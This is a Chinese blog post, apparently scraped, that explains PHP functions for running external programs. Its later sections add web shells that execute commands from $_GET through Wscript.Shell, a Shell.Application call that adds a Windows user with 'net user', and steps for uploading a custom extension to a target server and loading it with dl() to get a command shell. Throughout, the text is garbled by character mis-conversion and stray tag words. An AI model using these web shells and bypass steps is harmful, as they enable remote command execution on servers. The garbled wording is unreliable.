PHP调用外部程序的方法

时间 2019-11-11

标签 php 调用外部程序方法栏目 PHP 繁體版

原文原文链接

不少状况下须要php调用其余程序如shell命令、shell脚本、可执行程序等等，此时须要使用到诸如exec/system/popen/proc_open等函数，每种函数有各自适合使用的场景以及须要注意的地方。

前提：PHP没有运行在安全模式
若是PHP运行在安全模式下，那么在执行外部命令、打开文件、链接数据库、基于HTTP的认证这4个方面将会受到制约，可能在调用外部程序时没法获取预期的结果，此时须要设置特定目录，能够在php.ini中编辑safe_mode_exec_dir参数来指定。

1. exec
原型：string exec ( string command [, array &output [, int &return_var]] )
描述：返回值保存最后的输出结果，而全部输出结果将会保存到$output数组，$return_var用来保存命令执行的状态码（用来检测成功或失败）。
例子：$ret = exec("ls -al", $output, $var);
注意：
A. 输出结果会逐行追加到$output中，所以在调用exec以前须要unset($output)，特别是循环调用的时候。
B. 若是想经过exec调用外部程序后立刻继续执行后续代码，仅仅在命令里加"&"是不够的，此时exec依然会等待命令执行完毕；须要再将标准输出作重定向才能够，例如：exec("ls -al >/dev/null &", $output, $var);
C. 要学会善用EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串中全部可能瞒过Shell而去执行另一个命令的字符转义。这些字符在Shell中是有特殊含义的，象分号（|），重定向（>）和从文件读入（<）等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号，并把字符串中的单引号转义，这样这个字符串就能够安全地做为命令的参数。

2. system
原型：string system ( string command [, int &return_var] )
描述：执行给定的命令，返回最后的输出结果；第二个参数是可选的，用来获得命令执行后的状态码。
例子：$ret = system("ls -al", $var);
注意：略。

3. passthru
原型：void passthru (string command [, int return_var])
描述：执行给定的命令，但不返回任何输出结果，而是直接输出到显示设备上；第二个参数可选，用来获得命令执行后的状态码。
例子：passthru("ls -al", $var);
注意：略。

4. popen
原型：resource popen ( string command, string mode )
描述：打开一个指向进程的管道，该进程由派生给定的 command 命令执行而产生。返回一个和 fopen() 所返回的相同的文件指针，只不过它是单向的（只能用于读或写）而且必须用 pclose() 来关闭。此指针能够用于 fgets()，fgetss() 和 fwrite()。
例子：$fd = popen("command", 'r'); $ret = fgets($fd);
注意：只能打开单向管道，不是'r'就是'w'；而且须要使用pclose()来关闭。

5. proc_open
原型：resource proc_open ( string cmd, array descriptorspec, array &pipes [, string cwd [, array env [, array other_options]]] )
描述：与popen相似，可是能够提供双向管道。具体的参数读者能够本身翻阅资料，好比该博客： http://hi.baidu.com/alex_wang58/blog/item/a28657de16fec55195ee372a.html。
注意：
A. 后面须要使用proc_close()关闭资源，而且若是是pipe类型，须要用pclose()关闭句柄。
B. proc_open打开的程序做为php的子进程，php退出后该子进程也会退出。
C. 笔者在使用的时候遇到获取外部程序输出阻塞的问题，也就是在例子中的fgets($pipes[1])语句阻塞了，没法继续进行。通过多方查证后发现，问题通常出在外部程序中，好比外部程序是C程序，使用fprintf(stdin, "**** \n");输出结果，此时须要加上fflush(stdout);才行，不然输出结果可能会暂留缓存中，没法真正输出，而php也就没法获取输出了。
例子：

///< 打开管道

$pwd = "*****";

$pipes = array();

$command = "*****";

$desc = array(array('pipe', 'r'), array('pipe', 'w'), array('pipe', 'w'));

$handle = proc_open($command, $desc, $pipes, $pwd);

if (!is_resource($handle)) {

fprintf(STDERR, "proc_open failed.\n");

exit(1);

}

///< 读写

fwrite($pipes[0], "*****\n");

$ret = rtrim(fgets($pipes[1]), "\n");

///< 关闭管道

fclose($pipes[0]);

fclose($pipes[1]);

fclose($pipes[2]);

proc_close($handle);

6. shell_execphp

原型：string shell_exec ( string $cmd )
描述：cmd：要执行的命令返回值：命令执行的输出。若是执行过程当中发生错误或者进程不产生输出，则返回 NULL。
例子：html

[php] view plain copy

<?php
echo shell_exec('pwd');
?>

执行结果：/var/www/htmllinux

7. 反撇号`
shell

描述：shell_exec() 函数实际上仅是反撇号 (`) 操做符的变体数据库

例子：apache

[php] view plain copy

<?php
echo `pwd`;
?>

执行结果：/var/www/html
windows

8.cntl_exec数组

原型：void pcntl_exec ( string $path [, array $args [, array $envs ]] )
描述：(PHP 4 >= 4.2.0, PHP 5, PHP 7)
pcntl_exec — 在当前进程空间执行以给定参数执行指定程序。
pcntl是linux下的一个扩展，能够支持php的多线程操做。
参数:
path: 必须是可执行二进制文件路径或一个在文件第一行指定了一个可执行文件路径
标头的脚本（好比文件第一行是#!/usr/local/bin/perl的perl脚本）。更多的
信息请查看您系统的execve（2）手册。
args: 一个要传递给程序的参数的字符串数组。
envs: 一个要传递给程序做为环境变量的字符串数组。这个数组是 key => value格
式的，key表明要传递的环境变量的名称，value表明该环境变量值。
返回值:当发生错误时返回 FALSE ，没有错误时没有返回。
缓存

9. COM组建(针对windwos环境下使用com组建)安全

原型：
Wscript.Shell->exec(command) //
Shell.Application->ShellExecute(appName,appArgs,appPath) //
Shell.Application->open(appPath) //要填写程序绝对路径，而且应该没有办法加参数
Shell.Application->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverb()
Shell.Application->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverbEx()
描述：在windwos下，而且在php中开启com组建扩展以后可使用这种方法（打开方式自行百度）
完全的解决方案是直接删除System32目录下wshom.ocx文件
例子：

[php] view plain copy

<?php
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->exec("cmd.exe /c ".$_GET['c']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
<?php
$phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->ShellExecute("net"," user tiny tiny /add");
//$exec=$phpwsh->ShellExecute("cmd","/c net user tiny tiny /add");
?>
<?php
$phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->open("c:\\windows\\system32\\cmd.exe");
?>
<?php
$a=new COM("Shell.Application");
$a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverb();
?>
<?php
$a=new COM("Shell.Application");
$a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverbEx();
?>

10. dl()

要求：php没有开启安全模式，而且enable_dl选项为on，而且php版本支持dl函数（在 PHP 5.3 里，此函数被某些 SAPI 移除了，也就是没有这个函数？）说明：extension_dir选项能够指定扩展模块的目录，可是咱们可使用相对路径的方式绕过原理：本身编写扩展，而后使用dl加载此扩展。举例（linux）：准备工做：自行上网下载apache和相近版本的php源码，按照apache和php的官方文档进行安装。咱们主要须要三个文件:phpize，php-config和ext_skel：在正确安装好了apache和php以后， phpize和php-config将被安装（能够自行find），而ext_skel则是是在php源码中的ext目录中。 ext_skel是php源码包中的用来帮助制做扩展的程序。 1）转到php-x.x.xx/ext中首先新建xxx.skel文件，里面填写要制做的扩展中的函数原型，例如： string exec(string str) 2）执行命令：./ext_skel --extname=tinymin --proto=xxx.skel 以后便生成了tinymin目录，里面则是扩展所须要的文件 3）cd tinymin 4）vi config.m4 将 config.m4文件里面 dnl PHP_ARG_WITH(myext, for myext support, dnl Make sure that the comment is aligned: dnl [ --with-myext Include myext support]) 修改为 PHP_ARG_WITH(myext, for myext support, [ --with-myext Include myext support]) 5）vi tinymin.c 将PHP_FUNCTION(exec)后面的大括号里面的代码的最后一行删除，并写上本身的代码，修改后如：PHP_FUNCTION(haha) { char *str = NULL; int argc = ZEND_NUM_ARGS(); int str_len; if (zend_parse_parameters(argc TSRMLS_CC, "s", &str, &str_len) == FAILURE) return; return system(str); } 6）找到phpize:find / -name "phpize" 而后运行一下phpize: /my_lamp/php/bin/phpize 7) 一样方式找到php-config,而后运行configure： ./configure --with-php-config=/my_lamp/php/bin/php-config 8）make&&make install 以后便在本身的php扩展目录中生成了扩展tinymin.so 在目标服务器上面上传tinymin.so（不必定要在它的php扩展目录中，由于可使用相对路径）用法例如： <?php dl("../../../../../tmp/tinymin.so"); echo exec($_GET['cmd']); ?> 这种方法也很老了，我在本身的的kali2上面尝试这样作的时候提示没有dl这个函数，具体缘由参见php manual windows上应该也是同样的原理。不过没有试过